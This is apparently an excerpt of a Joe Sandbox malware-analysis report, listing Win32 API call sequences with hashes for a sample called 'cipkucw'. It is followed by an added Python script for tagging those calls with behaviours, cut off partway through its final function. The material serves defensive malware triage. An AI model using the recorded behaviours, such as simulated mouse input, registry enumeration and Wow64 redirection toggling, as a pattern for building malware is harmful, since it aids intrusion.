                                        • EnableWindow.USER32(?,00000000), ref: 00788BD1
                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00788C30
                                        • ShowWindow.USER32(?,00000004), ref: 00788C44
                                        • EnableWindow.USER32(?,00000001), ref: 00788C6A
                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00788C8E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID:
                                        • API String ID: 642888154-0
                                        • Opcode ID: 1e629b163b1b9d0a41281a26a935178825e85e102f0c21daa71a0b3a478fe58e
                                        • Instruction ID: a5835f7a32dc45ec56caa6a1fa40a587de5b2d52fbb6364835be204aafc231c3
                                        • Opcode Fuzzy Hash: 1e629b163b1b9d0a41281a26a935178825e85e102f0c21daa71a0b3a478fe58e
                                        • Instruction Fuzzy Hash: 5141B8B4641144AFDB65EF14C889FA17FE0FF45304F5881A9E5085F2A2CB79AC41CB55
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 00772C45
                                          • Part of subcall function 0076EE49: GetWindowRect.USER32(?,?), ref: 0076EE61
                                        • GetDesktopWindow.USER32 ref: 00772C6F
                                        • GetWindowRect.USER32(00000000), ref: 00772C76
                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00772CB2
                                        • GetCursorPos.USER32(?), ref: 00772CDE
                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00772D3C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                        • String ID:
                                        • API String ID: 2387181109-0
                                        • Opcode ID: 63b269ac595ce47bc1bf60fd27972ab08d4071ef428f37d86171a49cd54a3e33
                                        • Instruction ID: 608c41910d6797eedd7248267ff2f54673ef7dad78a2d2db6a14faaec4646fe2
                                        • Opcode Fuzzy Hash: 63b269ac595ce47bc1bf60fd27972ab08d4071ef428f37d86171a49cd54a3e33
                                        • Instruction Fuzzy Hash: 54312472505315ABDB20DF14C848F9F77A9FFC4394F10491AF89997191DB38EA09CBA1
                                        APIs
                                          • Part of subcall function 006F557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F5558,?,?,00734B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F559E
                                        • _wcslen.LIBCMT ref: 007661D5
                                        • CoInitialize.OLE32(00000000), ref: 007662EF
                                        • CoCreateInstance.OLE32(00790CC4,00000000,00000001,00790B34,?), ref: 00766308
                                        • CoUninitialize.OLE32 ref: 00766326
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 3172280962-24824748
                                        • Opcode ID: 237c73a93dfd0aa4b46d14e9909160b8d84c4495f2678f7eb0026f77737f2f05
                                        • Instruction ID: bb3b4779b51152725ad93173ef3472fc2af9847ad77216f9285678456138c51f
                                        • Opcode Fuzzy Hash: 237c73a93dfd0aa4b46d14e9909160b8d84c4495f2678f7eb0026f77737f2f05
                                        • Instruction Fuzzy Hash: E6D152716042049FCB14DF24C494A2ABBF6FF89714F54889CF98A9B362CB35ED45CB92
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0075210F
                                        • UnloadUserProfile.USERENV(?,?), ref: 0075211B
                                        • CloseHandle.KERNEL32(?), ref: 00752124
                                        • CloseHandle.KERNEL32(?), ref: 0075212C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00752135
                                        • HeapFree.KERNEL32(00000000), ref: 0075213C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                        • String ID:
                                        • API String ID: 146765662-0
                                        • Opcode ID: 6ff97e01feba84e5fa04473b5b8439218fd31ce3a3f17b6b5dc38d3f5811737d
                                        • Instruction ID: 25fe85119cf1f188fa02f630d9aa9048ae6de28870f3981234aceae8c93744a7
                                        • Opcode Fuzzy Hash: 6ff97e01feba84e5fa04473b5b8439218fd31ce3a3f17b6b5dc38d3f5811737d
                                        • Instruction Fuzzy Hash: FFE0E576484105FBDB112FE1ED0C90ABF39FF49322B218220F225824B4CB369C20EB58
                                        APIs
                                          • Part of subcall function 006F4154: _wcslen.LIBCMT ref: 006F4159
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0075CEAE
                                        • _wcslen.LIBCMT ref: 0075CEF5
                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0075CF5C
                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0075CF8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info_wcslen$Default
                                        • String ID: 0
                                        • API String ID: 1227352736-4108050209
                                        • Opcode ID: ef699288bff4fa587621e36346547b5c1e1609b9f1011577232d4fe8dd1e4068
                                        • Instruction ID: 77d2100e26be8bfee96d339e14ae607b079365f97f5c48a5652b22846a6fa626
                                        • Opcode Fuzzy Hash: ef699288bff4fa587621e36346547b5c1e1609b9f1011577232d4fe8dd1e4068
                                        • Instruction Fuzzy Hash: 1651E0726043009FD7169F28C885BABB7E9AF89315F040A2DFD95D61E0DBBCDD488792
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00784794
                                        • IsMenu.USER32(?), ref: 007847A9
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007847F1
                                        • DrawMenuBar.USER32 ref: 00784804
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Menu$Item$DrawInfoInsert
                                        • String ID: 0
                                        • API String ID: 3076010158-4108050209
                                        • Opcode ID: 06285786860c2ec8b940fdc71a55f01eecc01f1aaf10dfd9722c8d03f9537be4
                                        • Instruction ID: 732452ae8bf3ba641779939448ba6f6763330f60cce07f95fe4b4762d7a65203
                                        • Opcode Fuzzy Hash: 06285786860c2ec8b940fdc71a55f01eecc01f1aaf10dfd9722c8d03f9537be4
                                        • Instruction Fuzzy Hash: 7C415B75A4024AEFDB20DF54D888EAABBF5FF05354F148129E905A7250C778ED50CF50
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007526F6
                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00752709
                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00752739
                                          • Part of subcall function 006F84B7: _wcslen.LIBCMT ref: 006F84CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen$ClassName
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 2081771294-1403004172
                                        • Opcode ID: d382b08564f583eff00d66c7544770cec7acc7b8128eac0bc2acf2f4d2656c6b
                                        • Instruction ID: 3f466f42de391fed50d87ffb8423884269e028b494dda5c5266115fd88799bbd
                                        • Opcode Fuzzy Hash: d382b08564f583eff00d66c7544770cec7acc7b8128eac0bc2acf2f4d2656c6b
                                        • Instruction Fuzzy Hash: AD21F671940108BFDB14AB64C849CFEB7B9DF46760F104519FA11931E2DBBC4D4A9614
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,006F637F,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F633E
                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006F6350
                                        • FreeLibrary.KERNEL32(00000000,?,?,006F637F,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-3689287502
                                        • Opcode ID: 3462f1332fb3eb8453724189a1e8dbf3a621e5567bcb40dcd64108948eb6d32d
                                        • Instruction ID: 5f7b805a6407c105e0697793f23a0ab0321eab8e61bcbc2904b128bf711fc42d
                                        • Opcode Fuzzy Hash: 3462f1332fb3eb8453724189a1e8dbf3a621e5567bcb40dcd64108948eb6d32d
                                        • Instruction Fuzzy Hash: EAE08633A81B262792312716AC0CFAA671A9F82F227164115FA00D2280DB68CC0182B4
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,007354C3,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6304
                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006F6316
                                        • FreeLibrary.KERNEL32(00000000,?,?,007354C3,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6329
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-1355242751
                                        • Opcode ID: c5d7297944e9ab7c582ccfb8853b10440d01ac805d28692630f34548c344476f
                                        • Instruction ID: 4d093602ccf3e6bb55cc2e3f6d6b6a58d373fa360f95a4ac4ec9171c9132bcab
                                        • Opcode Fuzzy Hash: c5d7297944e9ab7c582ccfb8853b10440d01ac805d28692630f34548c344476f
                                        • Instruction Fuzzy Hash: ECD01236A829296742322726FC1CADE7F17DE85F213964015F900A22A8CF68CD0187E4
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 0077AD86
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0077AD94
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0077ADC7
                                        • CloseHandle.KERNEL32(?), ref: 0077AF9C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                        • String ID:
                                        • API String ID: 3488606520-0
                                        • Opcode ID: de8eb4c6a97cb1662e2528c7fc3713b0a05550cab7e3724032b1e7ca412e483c
                                        • Instruction ID: 74f7d09db3ec8e96fadc2bd42fc56ef9c51dffcfe572a1bb01d6777601945357
                                        • Opcode Fuzzy Hash: de8eb4c6a97cb1662e2528c7fc3713b0a05550cab7e3724032b1e7ca412e483c
                                        • Instruction Fuzzy Hash: 4FA190B1604301AFE720DF28C896B2AB7E5AF84710F14885DF559DB2D2DB75EC40CB96
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 0077D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C00D,?,?), ref: 0077D314
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D350
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D3C7
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D3FD
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C404
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0077C45F
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0077C4C2
                                        • RegCloseKey.ADVAPI32(?,?), ref: 0077C505
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0077C512
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                        • String ID:
                                        • API String ID: 826366716-0
                                        • Opcode ID: d3ab224efcb7f81e77a45553659b1dbc1d928a0f6794a436c1b49430ce4a2646
                                        • Instruction ID: d6fd2d97b7158fbe724ade07a82a35c7b5c395b8a62f11189a6aad63b8cadbb1
                                        • Opcode Fuzzy Hash: d3ab224efcb7f81e77a45553659b1dbc1d928a0f6794a436c1b49430ce4a2646
                                        • Instruction Fuzzy Hash: AE61BF31108245AFDB15DF24C894E3ABBE5FF88348F14849CF5598B2A2DB35ED45CB92
                                        APIs
                                          • Part of subcall function 0075E60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0075D6E2,?), ref: 0075E629
                                          • Part of subcall function 0075E60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0075D6E2,?), ref: 0075E642
                                          • Part of subcall function 0075E9C5: GetFileAttributesW.KERNELBASE(?,0075D755), ref: 0075E9C6
                                        • lstrcmpiW.KERNEL32(?,?), ref: 0075EC9F
                                        • MoveFileW.KERNEL32(?,?), ref: 0075ECD8
                                        • _wcslen.LIBCMT ref: 0075EE17
                                        • _wcslen.LIBCMT ref: 0075EE2F
                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0075EE7C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                        • String ID:
                                        • API String ID: 3183298772-0
                                        • Opcode ID: 15bcea0cc46c35855afb983927cdb5b73a4822583bead9cc7d0492dab7a9d0d3
                                        • Instruction ID: c03d0e257aed19c13fc0a12b131cc47a72ee19f2dc34ae3766bd93c0731f13f6
                                        • Opcode Fuzzy Hash: 15bcea0cc46c35855afb983927cdb5b73a4822583bead9cc7d0492dab7a9d0d3
                                        • Instruction Fuzzy Hash: 395186B24083859BD774EB54C8859DB73EDAF84351F00092EF689D3191EF78E68C876A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: de0d147576fcca177f89b118ef52de94fc2acdd9e38e56bc8d3db2902bfe3865
                                        • Instruction ID: f9d78dfa9607916194edaabda743bdbc536b95765d55653b29c93e90d624f3fa
                                        • Opcode Fuzzy Hash: de0d147576fcca177f89b118ef52de94fc2acdd9e38e56bc8d3db2902bfe3865
                                        • Instruction Fuzzy Hash: B441E672A00214EFCB20DF78D884A5DB3E5EF84714F158199E515EB392EB39ED42CB80
                                        APIs
                                        • GetInputState.USER32 ref: 00764225
                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 0076427C
                                        • TranslateMessage.USER32(?), ref: 007642A5
                                        • DispatchMessageW.USER32(?), ref: 007642AF
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007642C0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                        • String ID:
                                        • API String ID: 2256411358-0
                                        • Opcode ID: c5c1d0e6ab17c2dc84b47adfbec960c9885f0ac546d837b59ae7f86ffc2a7248
                                        • Instruction ID: 69589f807b0146b29852b4441a9bad1b11289f20aa302eb3cb5ab56661a83c09
                                        • Opcode Fuzzy Hash: c5c1d0e6ab17c2dc84b47adfbec960c9885f0ac546d837b59ae7f86ffc2a7248
                                        • Instruction Fuzzy Hash: A431C2705002429EEB35CB65D818FB73BE8BB15304F24456DEC63D21A1D67C9889CB29
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 007521A5
                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 00752251
                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 00752259
                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 0075226A
                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00752272
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessagePostSleep$RectWindow
                                        • String ID:
                                        • API String ID: 3382505437-0
                                        • Opcode ID: 8e0edee32ad58600b67384d279e4e0303b53f90312db6695f2be75ad64e0555d
                                        • Instruction ID: 64a1820bd148d9ee6bc60956ea443322eb3b446f117237e59d7198bdad1db71a
                                        • Opcode Fuzzy Hash: 8e0edee32ad58600b67384d279e4e0303b53f90312db6695f2be75ad64e0555d
                                        • Instruction Fuzzy Hash: 4631AD75A00219EFDB14CFA8CD88ADE3BB5FB15315F118225FE21A72D1C7B4AD458B90
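
                                        The function entries above list raw API calls with their arguments (the dynamic resolution of Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection through LoadLibraryA/GetProcAddress, the OpenProcess call with access mask 0x410 followed by GetProcessIoCounters, the RegConnectRegistryW/RegEnumKeyExW walk, and the PostMessageW 0x201/0x202 pair bracketed by Sleep). The script below is an added triage example, not part of the Joe Sandbox report or of the analysed sample: it parses listings in exactly this format and turns them into behaviour tags, decoding the access mask and the window-message numbers. The input records are copied from the entries above and labelled as such; the tag names, the selection of constants and the sequence rules are this example's own choices, while the constant values are the standard Win32 definitions.

```python
"""Tag Joe Sandbox function-level API listings with coarse behaviours.

Added triage example, not part of the report. Input lines are copied from
entries on this page; behaviour names and the constant tables are ours
(the constant values themselves are standard Win32 definitions).
"""
import re
from collections import namedtuple

ApiCall = namedtuple("ApiCall", "name module args ref")

# One "• Name.MODULE(args), ref: ADDR" line. The argument list and the
# "Part of subcall function ...:" prefix are both optional (both shapes occur).
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

PROCESS_ACCESS = {  # OpenProcess desired-access bits (subset)
    0x0001: "PROCESS_TERMINATE", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
WINDOW_MESSAGES = {  # second argument of SendMessageW/PostMessageW (subset)
    0x0188: "LB_GETCURSEL", 0x0189: "LB_GETTEXT", 0x018A: "LB_GETTEXTLEN",
    0x0201: "WM_LBUTTONDOWN", 0x0202: "WM_LBUTTONUP",
}


def parse_record(text):
    """Parse one function entry's API lines into ApiCall tuples, order kept."""
    calls = []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["name"], m["module"], args, m["ref"]))
    return calls


def _hex(arg):
    """Hex argument as int; None for '?' placeholders and symbolic arguments."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def describe_access(mask):
    """Render an OpenProcess access mask as named bits; unknown bits stay hex."""
    names = [n for bit, n in sorted(PROCESS_ACCESS.items()) if mask & bit]
    rest = mask & ~sum(PROCESS_ACCESS)
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names)


def tag_behaviours(calls):
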